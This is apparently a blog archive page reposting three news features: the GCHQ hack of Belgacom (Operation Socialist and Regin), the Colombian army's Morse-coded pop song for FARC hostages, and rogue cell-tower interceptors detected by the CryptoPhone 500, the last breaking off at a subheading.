Category Archives: Uncategorized

Operation Socialist The Inside Story of How British Spies Hacked Belgium’s Largest Telco

When the incoming emails stopped arriving, it seemed innocuous at first. But it would eventually become clear that this was no routine technical problem. Inside a row of gray office buildings in Brussels, a major hacking attack was in progress. And the perpetrators were British government spies.

It was in the summer of 2012 that the anomalies were initially detected by employees at Belgium’s largest telecommunications provider, Belgacom. But it wasn’t until a year later, in June 2013, that the company’s security experts were able to figure out what was going on. The computer systems of Belgacom had been infected with a highly sophisticated malware, and it was disguising itself as legitimate Microsoft software while quietly stealing data.

Last year, documents from National Security Agency whistleblower Edward Snowden confirmed that British surveillance agency Government Communications Headquarters was behind the attack, codenamed Operation Socialist. And in November, The Intercept revealed that the malware found on Belgacom’s systems was one of the most advanced spy tools ever identified by security researchers, who named it “Regin.”

The full story about GCHQ’s infiltration of Belgacom, however, has never been told. Key details about the attack have remained shrouded in mystery—and the scope of the attack unclear.

Now, in partnership with Dutch and Belgian newspapers NRC Handelsblad and De Standaard, The Intercept has pieced together the first full reconstruction of events that took place before, during, and after the secret GCHQ hacking operation.

Based on new documents from the Snowden archive and interviews with sources familiar with the malware investigation at Belgacom, The Intercept and its partners have established that the attack on Belgacom was more aggressive and far-reaching than previously thought. It occurred in stages between 2010 and 2011, each time penetrating deeper into Belgacom’s systems, eventually compromising the very core of the company’s networks.


Snowden told The Intercept that the latest revelations amounted to unprecedented “smoking-gun attribution for a governmental cyber attack against critical infrastructure.”

The Belgacom hack, he said, is the “first documented example to show one EU member state mounting a cyber attack on another…a breathtaking example of the scale of the state-sponsored hacking problem.”

Publicly, Belgacom has played down the extent of the compromise, insisting that only its internal systems were breached and that customers’ data was never found to have been at risk. But secret GCHQ documents show the agency gained access far beyond Belgacom’s internal employee computers and was able to grab encrypted and unencrypted streams of private communications handled by the company.

Belgacom invested several million dollars in its efforts to clean-up its systems and beef-up its security after the attack. However, The Intercept has learned that sources familiar with the malware investigation at the company are uncomfortable with how the clean-up operation was handled—and they believe parts of the GCHQ malware were never fully removed.

The revelations about the scope of the hacking operation will likely alarm Belgacom’s customers across the world. The company operates a large number of data links internationally (see interactive map below), and it serves millions of people across Europe as well as officials from top institutions including the European Commission, the European Parliament, and the European Council. The new details will also be closely scrutinized by a federal prosecutor in Belgium, who is currently carrying out a criminal investigation into the attack on the company.

Sophia in ’t Veld, a Dutch politician who chaired the European Parliament’s recent inquiry into mass surveillance exposed by Snowden, told The Intercept that she believes the British government should face sanctions if the latest disclosures are proven.

“Compensating Belgacom should be the very least it should do,” in ’t Veld said. “But I am more concerned about accountability for breaking the law, violating fundamental rights, and eroding our democratic systems.”

Other similarly sophisticated state-sponsored malware attacks believed to have been perpetrated by Western countries have involved Stuxnet, a bug used to sabotage Iranian nuclear systems, and Flame, a spy malware that was found collecting data from systems predominantly in the Middle East.

What sets the secret British infiltration of Belgacom apart is that it was perpetrated against a close ally—and is backed up by a series of top-secret documents, which The Intercept is now publishing.

GCHQ declined to comment for this story, and insisted that its actions are “necessary legal, and proportionate.”


The beginning

The origins of the attack on Belgacom can be traced back to 2009, when GCHQ began developing new techniques to hack into telecommunications networks. The methods were discussed and developed during a series of top-secret “signals development” conferences, held annually by countries in the so-called “Five Eyes” surveillance alliance: the United States, the United Kingdom, Australia, New Zealand, and Canada.

Between 2009 and 2011, GCHQ worked with its allies to develop sophisticated new tools and technologies it could use to scan global networks for weaknesses and then penetrate them. According to top-secret GCHQ documents, the agency wanted to adopt the aggressive new methods in part to counter the use of privacy-protecting encryption—what it described as the “encryption problem.”

When communications are sent across networks in encrypted format, it makes it much harder for the spies to intercept and make sense of emails, phone calls, text messages, internet chats, and browsing sessions. For GCHQ, there was a simple solution. The agency decided that, where possible, it would find ways to hack into communication networks to grab traffic before it’s encrypted.

The British spies identified Belgacom as a top target to be infiltrated. The company, along with its subsidiary Belgacom International Carrier Services, plays an important role in Europe, and has partnerships with hundreds of telecommunications companies across the world—in Africa, Asia, Europe, the Middle East, and the United States. The Belgacom subsidiary maintains one of the world’s largest “roaming” hubs, which means that when foreign visitors traveling through Europe on vacation or a business trip use their cellphones, many of them connect to Belgacom’s international carrier networks.

The Snowden documents show that GCHQ wanted to gain access to Belgacom so that it could spy on phones used by surveillance targets travelling in Europe. But the agency also had an ulterior motive. Once it had hacked into Belgacom’s systems, GCHQ planned to break into data links connecting Belgacom and its international partners, monitoring communications transmitted between Europe and the rest of the world. A map in the GCHQ documents, named “Belgacom_connections,” highlights the company’s reach across Europe, the Middle East, and North Africa, illustrating why British spies deemed it of such high value.

Attack planning

Before GCHQ launched its attack on Belgacom’s systems, the spy agency conducted in-depth reconnaissance, using its powerful surveillance systems to covertly map out the company’s network and identify key employees “in areas related to maintenance and security.”

GCHQ documents show that it maintains special databases for this purpose, storing details about computers used by engineers and system administrators who work in the nerve center, or “network operations center,” of computer networks worldwide. Engineers and system administrators are particularly interesting to the spies because they manage networks—and hold the keys that can be used to unlock large troves of private data.

GCHQ developed a system called NOCTURNAL SURGE to search for particular engineers and system administrators by finding their IP addresses, unique identifiers that are allocated to computers when they connect to the internet. In early 2011, the documents show, GCHQ refined the NOCTURNAL SURGE system with the help of its Canadian counterparts, who had developed a similar tool, named PENTAHO.

GCHQ narrowed down IP addresses it believed were linked to the Belgacom engineers by using data its surveillance systems had collected about internet activity, before moving into what would be the final stages prior to launching its attack. The documents show that the agency used a tool named HACIENDA to scan for vulnerable potential access points in the Belgacom’s networks; it then went hunting for particular engineers or administrators that it could infect with malware.


The infection

The British spies, part of special unit named the Network Analysis Center, began trawling through their vast repositories of intercepted Internet data for more details about the individuals they had identified as suspected Belgacom engineers.

The spies used the IP addresses they had associated with the engineers as search terms to sift through their surveillance troves, and were quickly able to find what they needed to confirm the employees’ identities and target them individually with malware.

The confirmation came in the form of Google, Yahoo, and LinkedIn “cookies,” tiny unique files that are automatically placed on computers to identify and sometimes track people browsing the Internet, often for advertising purposes. GCHQ maintains a huge repository named MUTANT BROTH that stores billions of these intercepted cookies, which it uses to correlate with IP addresses to determine the identity of a person. GCHQ refers to cookies internally as “target detection identifiers.”

Top-secret GCHQ documents name three male Belgacom engineers who were identified as targets to attack. The Intercept has confirmed the identities of the men, and contacted each of them prior to the publication of this story; all three declined comment and requested that their identities not be disclosed.

GCHQ monitored the browsing habits of the engineers, and geared up to enter the most important and sensitive phase of the secret operation. The agency planned to perform a so-called “Quantum Insert” attack, which involves redirecting people targeted for surveillance to a malicious website that infects their computers with malware at a lightning pace. In this case, the documents indicate that GCHQ set up a malicious page that looked like LinkedIn to trick the Belgacom engineers. (The NSA also uses Quantum Inserts to target people, as The Intercept has previously reported.)

A GCHQ document reviewing operations conducted between January and March 2011 noted that the hack on Belgacom was successful, and stated that the agency had obtained access to the company’s systems as planned. By installing the malware on the engineers’ computers, the spies had gained control of their machines, and were able to exploit the broad access the engineers had into the networks for surveillance purposes.

The document stated that the hacking attack against Belgacom had penetrated “both deep into the network and at the edge of the network,” adding that ongoing work would help “further this new access.”

By December 2011, as part of a second “surge” against Belgacom, GCHQ identified other cellphone operators connecting to company’s network as part of international roaming partnerships, and successfully hacked into data links carrying information over a protocol known as GPRS, which handles cellphone internet browsing sessions and multimedia messages.

The spy agency was able to obtain data that was being sent between Belgacom and other operators through encrypted tunnels known as “virtual private networks.” GCHQ boasted that its work to conduct “exploitation” against these private networks had been highly productive, noting “the huge extent of opportunity that this work has identified.” Another document, dated from late 2011, added: “Network Analysis on BELGACOM hugely successful enabling exploitation.”

GCHQ had accomplished its objective. The agency had severely compromised Belgacom’s systems and could intercept encrypted and unencrypted private data passing through its networks. The hack would remain undetected for two years, until the spring of 2013.


The discovery

In the summer 2012, system administrators detected errors within Belgacom’s systems. At the company’s offices on Lebeau Street in Brussels, a short walk from the European Parliament’s Belgian offices, employees of Belgacom’s BICS subsidiary complained about problems receiving emails. The email server had malfunctioned, but Belgacom’s technical team couldn’t work out why.

The glitch was left unresolved until June 2013, when there was a sudden flare-up. After a Windows software update was sent to Belgacom’s email exchange server, the problems returned, worse than before. The administrators contacted Microsoft for help, questioning whether the new Windows update could be the reason for the fault. But Microsoft, too, struggled to identify exactly what was going wrong. There was still no solution to be found. (Microsoft declined to comment for this story.)

Sources familiar with the investigation described the malware as the most advanced they had ever seen.

Belgacom’s internal security team began to suspect that the systems had been infected with some sort of virus, and the company decided it was time to call in outside experts. It hired Dutch computer security firm Fox-IT to come and scan the systems for anything suspicious.

Before long, Fox-IT discovered strange files on Belgacom’s email server that appeared to be disguised as legitimate Microsoft software. The suspicious files had been enabling a highly sophisticated hacker to circumvent automatic Microsoft software updates of Belgacom’s systems in order to continue infiltrating the company’s systems.

About a month after Belgacom had identified the malicious software, or malware, it informed Belgian police and the country’s specialist federal computer crime unit, according to sources familiar with the incident. Belgian military intelligence was also called in to investigate the hack, together with Fox-IT.

The experts from Fox IT and military intelligence worked to dissect the malware on Belgacom’s systems, and were shocked by what they found. In interviews with The Intercept and its reporting partners, sources familiar with the investigation described the malware as the most advanced they had ever seen, and said that if the email exchange server had not malfunctioned in the first place, the spy bug would likely have remained inside Belgacom for several more years.

A deep breach

While working to assess the extent of the infection at Belgacom, the team of investigators realized that the damage was far more extensive than they first thought. The malware had not only compromised Belgacom’s email servers, it had infected more than 120 computer systems operated by the company, including up to 70 personal computers.

The most serious discovery was that the large routers that form the very core of Belgacom’s international carrier networks, made by the American company Cisco, were also found to have been compromised and infected. The routers are one of the most closely guarded parts of the company’s infrastructure, because they handle large flows of sensitive private communications transiting through its networks.

Earlier Snowden leaks have shown how the NSA can compromise routers, such as those operated by Cisco; the agency can remotely hack them, or physically intercept and bug them before they are installed at a company. In the Belgacom case, it is not clear exactly which method was used by GCHQ—or whether there was any direct NSA assistance. (The NSA declined to comment for this story.)

Either way, the malware investigators at Belgacom never got a chance to study the routers. After the infection of the Cisco routers was found, the company issued an order that no one could tamper with them. Belgacom bosses insisted that only employees from Cisco could handle the routers, which caused unease among some of the investigators.

“You could ask many security companies to investigate those routers,” one of the investigators told The Intercept. By bringing in Cisco employees to do the investigation, “you can’t perform an independent inspection,” said the source, who spoke on condition of anonymity because he was not authorized to speak to the media

A spokesman for Cisco declined to comment on the Belgacom investigation, citing company policy. “Cisco does not comment publicly on customer relationships or specific customer incidents,” the spokesman said.

Shortly after the malware was found on the routers, Fox-IT was told by Belgacom to stop its investigation. Researchers from the Dutch security company were asked to write-up a report about their findings as soon as possible. Under the conditions of a non-disclosure agreement, they could not speak about what they had found, nor could they publicly warn against the malware. Moreover, they were not allowed to remove the malware.

Between late August and mid-Sept. 2013, there was an intense period of activity surrounding Belgacom.

On August 30, some parts of the malware were remotely deleted from the company’s infected systems—apparently after the British spies realized that it had been detected. But the malware was not completely removed, according to sources familiar with the investigation.

Two weeks later, on Sept. 14, employees from Belgacom, investigators, police and military intelligence services began an intensive attempt to completely purge the spy bug from the systems.

During this operation, journalists were tipped off for the first time about the malware investigation. The Intercept’s Dutch and Belgian partners NRC Handelsblad and De Standaard reported the news, disclosing that sources familiar with the investigation suspected NSA or GCHQ may have been responsible for the attack.

The same day the story broke, on Sept. 16, Belgacom issued a press release. “At this stage there is no indication of any impact on the customers or their data,” it said. “At no point in time has the delivery of our telecommunication services been compromised. “

Then, on Sept. 20, German news magazine Der Spiegel published documents from Snowden revealing that British spies were behind the hack, providing the first confirmation of the attacker’s identity.


Significant resources

In the aftermath of the revelations, Belgacom refused to comment on GCHQ’s role as the architect of the intrusion. Top officials from the company were called to appear before a European Parliamentary committee investigating the extent of mass surveillance revealed by Snowden.

The Belgacom bosses told the committee that there were no problems with Belgacom’s systems after a “meticulous” clean-up operation, and again claimed that private communications were not compromised. They dismissed media reports about the attack, and declined to discuss anything about the perpetrator, saying only that “the hackers [responsible] have considerable resources behind them.”

People with knowledge of the malware investigation watched Belgacom’s public statements with interest. And some of them have questioned the company’s version of events.

“There was only a partial clean-up,” said one source familiar with the malware investigation. “I believe it is still there. It is very hard to remove and, from what I’ve seen, Belgacom never did a serious attempt to remove it.”

Belgacom declined to comment for this story, citing the ongoing criminal investigation in Belgium.

Last month, The Intercept confirmed Regin as the malware found on Belgacom’s systems during the clean-up operation.

The spy bug was described by security researchers as one of the most sophisticated pieces of malware ever discovered, and was found to have been targeting a host of telecommunications networks, governments, and research organizations, in countries such as Germany, Iran, Brazil, Russia, and Syria, as well as Belgium.

GCHQ has refused to comment on Regin, as has the NSA, and Belgacom. But Snowden documents contain strong evidence, which has not been reported before, that directly links British spies to the malware.

Aside from showing extensive details about how the British spies infiltrated the company and planted malware to successfully steal data, GCHQ documents in the Snowden archive contain codenames that also appear in samples of the Regin malware found on Belgacom’s systems, such as “Legspin” and “Hopscotch.”

One GCHQ document about the use of hacking methods references the use of “Legspin” to exploit computers. Another document describes “Hopscotch” as part of a system GCHQ uses to analyze data collected through surveillance.

Ronald Prins, director of the computer security company Fox-IT, has studied the malware, and played a key role in the analysis of Belgacom’s infected networks.

“Documents from Snowden and what I’ve seen from the malware can only lead to one conclusion,” Prins told The Intercept. “This was used by GCHQ.”

Enkripsi Morse Dalam Lagu


THE CODE: A declassified and unbelievable hostage rescue story

How the Colombian army sent a hidden message to hostages… using a pop song

By Jeff Maysh

Colonel Jose Espejo was a man with a problem. As the Colombian army’s communications expert watched the grainy video again, he saw kidnapped soldiers chained up inside barbed-wire pens in a hostage camp deep in the jungle, guarded by armed FARC guerillas. Some had been hostages for more than 10 years, and many suffered from a grim, flesh-eating disease caused by insect bites.

It was 2010, and the straight-talking Espejo was close to retirement after 22 years of military service. But he couldn’t stand the thought of quitting with men left behind enemy lines. He needed an idea, and when he needed an idea, he always went to one man.

Juan Carlos Ortiz was dunking his kids in the pool at his home in Coconut Grove, Miami, when he got the call from Colonel Espejo. With his easy charm and seemingly natural talent for creating clever commercials, the 42-year-old advertising executive had earned himself a Don Draper-like reputation in Colombia.

The ambitious Ortiz had shot to fame at the Colombian office of Leo Burnett — the legendary ad agency behind Tony the Tiger — where he created an anti-drug TV spot for the Colombian President’s Office. The ad showed an addict on a bus mistaking a fellow passenger’s dandruff for cocaine and snorting it up his nose. It made Ortiz the first Colombian to win a gold Lion at Cannes, the advertising industry’s Oscars. He returned to Bogotá a national hero and received a commendation from the nation’s first lady.

The success of his ad also brought threats from FARC guerillas, who relied, in part, on the cocaine market to fund their decades-old campaign against the government. “I had gone against their objectives with my anti-cocaine commercial,” he remembers. “They offered me the opportunity of paying them in exchange for my life.”

Deeply concerned by threatening letters and phone calls, Ortiz bought a bulletproof car for his family, and even assisted police in a sting operation to catch his blackmailers. But the threats persisted, and fearing for his safety, his employer urgently transferred Ortiz to its New York office. He took his family with him. A high-profile move to rival ad agency DDB in Miami followed, but Ortiz could never forget his enmity toward the FARC. He became the go-to guy for the Colombian army’s more bizarre requests in their battle against the guerillas.

On the telephone, Colonel Espejo explained that he urgently needed to get a message to the captured Colombian soldiers: help was coming. Daring commando missions were taking place throughout the region, including Operation Chameleon — a sixth-month operation that involved 300 government soldiers and secret raids. Because the FARC shoots hostages dead at the first sight of a military invasion, Espejo had to convey to the captives to be ready to escape.

How do you reach soldiers held under 24-hour armed guard in deeply rural territory? Juan Carlos Ortiz’s mind raced between ideas: Sky-writing? Aid parcels containing secret messages?

the army air-dropped 7 million pacifiers into the jungle with a message encouraging rebels to return to civilizationOrtiz had designed unorthodox campaigns to battle the FARC before. In 2008, he dreamed up an operation to persuade pregnant female guerrillas to defect: the army air-dropped 7 million pacifiers into the jungle with a message encouraging rebels to return to civilization. The operation involved seven helicopters, three airplanes, 960 flight hours, 17,800 gallons of fuel, and 72 soldiers flying twice a week for four months. During the holidays, the army illuminated giant Christmas trees across the jungle to remind guerrillas what they were missing. They also wrote messages promoting peace on soccer balls and floated them down the river toward the rebel encampments.

But this operation would be far more challenging. They had to create a message that could be understood by the hostages, but remain invisible to their captors. They needed to give the hostages hope, and encourage any soldiers harboring plans of escape that now was the time. Ortiz agreed to participate, and boarded the next plane to Bogotá.

The Revolutionary Armed Forces of Colombia, or FARC, emerged in the 1960s as a group of armed Communist peasants opposing the government and demanding labor reforms. This followed a period in Colombian history known as “La Violencia,” when fighting between the Liberal and Conservative parties resulted in 300,000 deaths. Driven deep into the jungle by a 1964 military bombing campaign, the FARC built up their strength and numbers. By 2010 the FARC had an estimated 8,000 to 10,000 members, according to the International Crisis Group.

By the time that the FARC and the Colombian government announced a ceasefire at the end of last year, their civil war had become one of the longest-running and bloodiest in the world. The FARC, Latin America’s oldest surviving left-wing insurgency, has been labeled a terrorist group by the US State Department and has a long history of kidnapping to help finance its operations. In the past decade, 6,880 people have been snatched in Colombia and held for ransom — some for as long as 18 years. Five hundred of the hostages are either involved with the military or politics. While the FARC prefer to kidnap Americans for money, prominent Colombian prisoners can be valuable political leverage.

Hostages’ accounts of their time in captivity are harrowing: Sgt. Jose Libardo Forero was one of Colombia’s “forgotten” hostages, held by the FARC for nearly 13 years. After his release, Forero spoke of relieving his mental anguish by bonding with jungle animals and one pet pig he called Josefo, whom he got hooked on coffee. Colombian politician Ingrid Betancourt, held for six years, recalled being chained to a tree by her neck.

Ortiz arrived at the Bogotá headquarters of the DDB advertising agency. The modern building features floor-to-ceiling windows that boast panoramic views of the traffic-choked Colombian capital, but keep out the symphony of car horns playing below. That day he was joined by his team of creative minds: Rodrigo Bolivar, Alfonso Diaz, Mario León, and Luis Castilla, the leading lights of Colombia’s advertising industry. Together with Colonel Espejo, they brainstormed ways to get a message to the hostages.

Sending messages directly to hostages is often impossible and not found in the guidebook of any law enforcement or military agency, says Christopher Voss, the FBI’s lead international kidnapping negotiator from 2003 to 2007. Now the owner of the negotiation firm Black Swan Group, Voss says: “When you send a message to a hostage, you have to assume the hostage takers are seeing it too.”

Gary Noesher is a former Chief Negotiator for the FBI who spent 23 years rescuing hostages and has dealt directly with the FARC. He says that sending sensitive messages meant solely for hostages is “incredibly risky.” Colonel Espejo’s case reminds him of a siege at the Japanese ambassador’s mansion in Lima, Peru, in December 1996. Noesher was on the team tasked with saving 72 hostages. “Secret messages were transmitted through the garbage. We received word that terrorists played indoor soccer in the living room, and a bomb was placed underneath the room and detonated,” Noesher says. “That is the only time I can remember covert messages sent to hostages.” Noesher won’t say exactly how the messages were sent, but adds: “Food and water were going into the embassy. All I can say is… messages were transmitted.” All of the militants were killed, along with two commandos and one hostage.

Sending messages directly to hostages is often impossibleCol. Espejo ran the brainstorming session with the efficiency of a military operation. He explained that FARC guerrillas usually allow hostages access to radios; it relieves the tedium of long hikes through the Colombian jungle and keeps their minds from escape.

Communicating with hostages via radio is a years-old practice in Colombia. The show “Voices of Kidnapping” on Bogota’s Caracol Radio is dedicated to victims’ families who send messages to their loved ones via special call-ins. Creator Herbin Hoyos Medina came up with the idea in 1994, after he was kidnapped for 17 days. He now broadcasts the show from Madrid, giving families 30-second slots to send messages.

Ortiz considered hiding a message in a radio commercial, perhaps hidden in the fine print spoken quickly at the end. Then Diaz, the creative director, suggested using code. What about código Morse, he said — Morse code.

Jeremiah Andrew Denton Jr. blinking T-O-R-T-U-R-E in Morse code

It wouldn’t be the first time Morse code was used in a hostage situation; in 1977, one of 52 hostages held captive by South-Moluccan gunmen on a Dutch train managed to transmit the message “get us out of here,” using sunlight and a hand mirror. Then there was Jeremiah Andrew Denton Jr., a United States Navy rear admiral who spent almost eight years as a prisoner of war in Vietnam, four of those in solitary confinement. In a forced North Vietnamese television interview in 1966, Denton ingeniously used Morse code to communicate with American Intelligence by blinking his eyes to spell out “T-O-R-T-U-R-E”.

“It was a eureka moment! We thought about hiding the Morse code in an advert,” says Ortiz. “Then we thought, how about a song?” As a young man, Ortiz was a musician, but his career never took off. The idea of producing a hit song appealed to him.

Ortiz pitched the Colonel a plan as if he were pitching a commercial to Heinz or Coca-Cola. The Colonel stroked his chin. Espejo liked the code idea, because he knew that many soldiers — especially in the communications departments — were taught Morse code in their basic training. Furthermore, Espejo reasoned, “The FARC were peasants from the fields, they wouldn’t know [Morse].” It was a longshot, but if the team could disguise the telltale dot-dot-dash signals in a song, there was a chance the soldiers would hear the message.

Radio Bemba is a small recording studio with six electric guitars on the wall where musicians write catchy commercial jingles. If the DDB agency is in Bogotá’s “Manhattan,” Radio Bemba is in the city’s “Brooklyn,” sharing its front door with an architecture company in a 50-year-old building on an edgy street.Word quickly got around the studio that the military wanted to produce a song so popular it would enterr the “Lista 40″ — Colombia’s Billboard charts. Producer Carlos Portela, 34, thought they were nuts.

“But they were deadly serious, and explained it was a secret project,” says Portela, who wears an eyebrow ring and produces music for beer commercials. “Obviously we had never worked with Morse code before. But they were very specific about what they wanted. They needed to know if we could hide their message in a song, so that nobody would detect it unless they knew Morse code.”

The team began experimenting with Morse code using various percussion instruments and a keyboard. They learned that operators skilled in Morse code can often read the signals at a rate of 40 words per minute — but played that fast, the beat would sound like a European Dance track. “We discovered the magic number was 20,” says Portela. “You can fit approximately 20 Morse code words into a piece of music the length of a chorus, and it sounds okay.”

“You can fit approximately 20 Morse code words into… the length of a chorus, and it sounds okay.”With the help of a military policeman skilled in Morse, they coded the message: “19 people rescued. You are next. Don’t lose hope.” It was a signal to boost morale and indicate that help was nearby. Portela wrote the song and the lyrics with composer Amaury Hernandez, creating a thinly-veiled ballad about life as a hostage: “In the middle of the night / Thinking about what I love the most / I feel the need to sing… About how much I miss them.” He even added the lyric, “Listen to this message, brother,” just before the coded message kicks in. The code sounds like a brief synth interlude just after the chorus.

Portela says they played with the Morse code using Reason software, which gives each audio channel or instrument its own dedicated track. With a separate visual lane for certain elements, it was possible to match the code to the beat of the song — and, crucially, blend it in.

The CODE morse GIF

Hiding the Morse code took weeks, with constant back-and-forth with Col. Espejo and the military to make sure their men could understand the message. “It was difficult because Morse code is not a musical beat. Sometimes it was too obvious,” says Portela. “Other times the code was not understood. And we had to hide it three times in the song to make sure the message was received.”

Finally, in September 2010, the song was mastered. They titled it “Better Days,” performed by session artists Natalia Gutierrez Y Angelo, fairly anonymous background musicians who’d worked on other jingles at the studio. Ortiz thought it was a masterpiece. “When I first listened, I thought it was a song of freedom,” he says.

With the song completed, they had to get it on the airwaves. Commercial Colombian stations largely only played hits by famous artists like Coldplay and Shakira. Luckily, says Col. Espejo, in many of the jungle areas where the hostages were held, all the radio stations were controlled by the government. “The hostages were listening to our own stations, so we made sure the song was played,” he says. “The code message said, ‘you’re next’ because the hostages thought if they ran away, they would die in the jungle. We let them know that our troops were nearby.’” At that time, active commando missions were underway, placing troops undercover in FARC-controlled areas.

Former hostage Major General Luis Mendieta Ovalle Herlindo helped the operation by appearing on live television and making an appeal directly to the guerillas. Herlindo, who escaped in one of the secretive commando-led escapes during “Operation Chameleon,” said: “This message is for members of the FARC. For those being held captive without a radio. Please, give them radio.” Though it might seem that this gave the game away, to Colombians it sounded like an appeal for hostages to be able to hear the voices of their families, who call in to radio shows.

The song was played on over 130 small stations and heard by 3 million people. Though most Colombians in major cities would not even recognize the song, it became popular in the rural areas controlled by the FARC. By December 2010, “Better Days” was echoing across the jungle. And the plan worked.

“We know of hostages who heard the message and were able to escape and provide information that led to the release of more hostages,” says Colonel Espejo.

Later in December 2010, the FARC announced its plans to release five more hostages as a humanitarian gesture, including a police major, two military service members, and two politicians; two months later, Major Guillermo Solorzano, 35, and Corporal Salin Sanmiguel, 28, were released back to their families; and in the spring of 2012, the last 10 police and military hostages — some of whom had spent 14 years in captivity — were released and flown in a Brazilian military helicopter to safety. Colonel Espejo watched the hostages on TV, waving and punching the air with delight as they stepped off a helicopter in Villavicencio. At the country’s presidential palace, the president, Juan Manuel Santos, said: “Welcome to liberty, soldiers and policemen of Colombia. Freedom has been very delayed, but now it is yours, to the delight of the whole country.”

One former hostage was able to confirm the song’s effectiveness, according to Col. Espejo. He told Ortiz of a clandestine operation that resulted in the release of Private Joshua Alvarez. In his military psychological evaluation, Col. Espejo says that the soldier spoke of hearing “the code hidden in the song,” and revealed how the message was passed from soldier to soldier. The song was even enjoyed by the FARC, who were oblivious to its secret message. Back home in his village in western Nariño, Alvarez was greeted with a hero’s welcome, including fireworks and banners.

“It makes me very happy to think of the hostages listening to our song,” Ortiz says.

Ortiz still keeps in touch with Col. Espejo, who retired from the military and now works as a journalist. Col. Espejo wrote the book El Gran Cartel, an investigation into the FARC’s finances. Ortiz continues to travel between Colombia, New York, and Miami, where he has created commercials for Rice Krispies and Volkswagen. He’s earned a place in the American Advertising Federation’s Hall of Fame, and on a top 10 list of “exceptional Colombians.”

On the wall of Ortiz’s Miami office there’s a photo of him celebrating his gold Lion for the dandruff cocaine ad in 2000, wildly waving a Colombian flag on stage. He recalls how he persuaded a local tailor in Cannes to fashion him a Colombian flag on the morning of the awards. Receiving that award should have been the greatest moment of his life, he says, but that victory was marred by the FARC and their threats. “One moment, I was the king of the world,” he says ruefully, “the next… just another Colombian victim of the terrorists. Being able to help the military with the code project was my way of helping them fight.”

The army agreed to declassify “The Code” operation in 2011 and allowed the song to be entered into the Cannes Lions. “Better Days” earned Ortiz his second gold Lion. “This time,” he says, “we enjoyed it.”


Mysterious Phony Cell Towers Could Be Intercepting Your Calls

Unencrypted Connection

Unencrypted Connection by Les Goldsmith

Like many of the ultra-secure phones that have come to market in the wake of Edward Snowden’s leaks, the CryptoPhone 500, which is marketed in the U.S. by ESD America and built on top of an unassuming Samsung Galaxy SIII body, features high-powered encryption. Les Goldsmith, the CEO of ESD America, says the phone also runs a customized or “hardened” version of Android that removes 468 vulnerabilities that his engineering team team found in the stock installation of the OS.

His mobile security team also found that the version of the Android OS that comes standard on the Samsung Galaxy SIII leaks data to parts unknown 80-90 times every hour.  That doesn’t necessarily mean that the phone has been hacked, Goldmsith says, but the user can’t know whether the data is beaming out from a particular app, the OS, or an illicit piece of spyware.  His clients want real security and control over their device, and have the money to pay for it.

To show what the CryptoPhone can do that less expensive competitors cannot, he points me to a map that he and his customers have created, indicating 17 different phony cell towers known as “interceptors,” detected by the CryptoPhone 500 around the United States during the month of July alone. (The map below is from August.)  Interceptors look to a typical phone like an ordinary tower.  Once the phone connects with the interceptor, a variety of “over-the-air” attacks become possible, from eavesdropping on calls and texts to pushing spyware to the device.

August GSM Interceptor Map

“Interceptor use in the U.S. is much higher than people had anticipated,” Goldsmith says.  “One of our customers took a road trip from Florida to North Carolina and he found 8 different interceptors on that trip.  We even found one at South Point Casino in Las Vegas.”

Who is running these interceptors and what are they doing with the calls?

Who is running these interceptors and what are they doing with the calls?  Goldsmith says we can’t be sure, but he has his suspicions.

“What we find suspicious is that a lot of these interceptors are right on top of U.S. military bases.  So we begin to wonder – are some of them U.S. government interceptors?  Or are some of them Chinese interceptors?” says Goldsmith.  “Whose interceptor is it?  Who are they, that’s listening to calls around military bases?  Is it just the U.S. military, or are they foreign governments doing it?  The point is: we don’t really know whose they are.”

Ciphering Disabled
Les Goldsmith

Interceptors vary widely in expense and sophistication – but in a nutshell, they are radio-equipped computers with software that can use arcane cellular network protocols and defeat the onboard encryption.  Whether your phone uses Android or iOS, it also has a second operating system that runs on a part of the phone called a baseband processor.  The baseband processor functions as a communications middleman between the phone’s main O.S. and the cell towers.  And because chip manufacturers jealously guard details about the baseband O.S., it has been too challenging a target for garden-variety hackers.

“The baseband processor is one of the more difficult things to get into or even communicate with,” says Mathew Rowley, a senior security consultant at Matasano Security.  “[That’s] because my computer doesn’t speak 4G or GSM, and also all those protocols are encrypted.  You have to buy special hardware to get in the air and pull down the waves and try to figure out what they mean.  It’s just pretty unrealistic for the general community.”

But for governments or other entities able to afford a price tag of “less than $100,000,” says Goldsmith, high-quality interceptors are quite realistic.  Some interceptors are limited, only able to passively listen to either outgoing or incoming calls.  But full-featured devices like the VME Dominator, available only to government agencies, can not only capture calls and texts, but even actively control the phone, sending out spoof texts, for example.  Edward Snowden revealed that the N.S.A. is capable of an over-the-air attack that tells the phone to fake a shut-down while leaving the microphone running, turning the seemingly deactivated phone into a bug.  And various ethical hackers have demonstrated DIY interceptor projects, using a software programmable radio and the open-source base station software package OpenBTS – this creates a basic interceptor for less than $3,000.  On August 11, the F.C.C. announced an investigation into the use of interceptors against Americans by foreign intelligence services and criminal gangs.

An “Over-the-Air” Attack Feels Like Nothing

Whenever he wants to test out his company’s ultra-secure smart phone against an interceptor, Goldsmith drives past a certain government facility in the Nevada desert.  (To avoid the attention of the gun-toting counter-intelligence agents in black SUVs who patrol the surrounding roads, he won’t identify the facility to Popular Science).  He knows that someone at the facility is running an interceptor, which gives him a good way to test out the exotic “baseband firewall” on his phone.  Though the baseband OS is a “black box” on other phones, inaccessible to manufacturers and app developers, patent-pending software allows the GSMK CryptoPhone 500 to monitor the baseband processor for suspicious activity.

So when Goldsmith and his team drove by the government facility in July, he also took a standard Samsung Galaxy S4 and an iPhone to serve as a control group for his own device.

”As we drove by, the iPhone showed no difference whatsoever.  The Samsung Galaxy S4, the call went from 4G to 3G and back to 4G.  The CryptoPhone lit up like a Christmas tree.”

Though the standard Apple and Android phones showed nothing wrong, the baseband firewall on the Cryptophone set off alerts showing that the phone’s encryption had been turned off, and that the cell tower had no name – a telltale sign of a rogue base station.   Standard towers, run by say, Verizon or T-Mobile, will have a name, whereas interceptors often do not.

Some devices can not only capture calls and texts, but even actively control the phone and send spoof texts.

And the interceptor also forced the CryptoPhone from 4G down to 2G, a much older protocol that is easier to de-crypt in real-time.  But the standard smart phones didn’t even show they’d experienced the same attack.

“If you’ve been intercepted, in some cases it might show at the top that you’ve been forced from 4G down to 2G.  But a decent interceptor won’t show that,” says Goldsmith.  “It’ll be set up to show you [falsely] that you’re still on 4G.  You’ll think that you’re on 4G, but you’re actually being forced back to 2G.”

So Do I Need One?

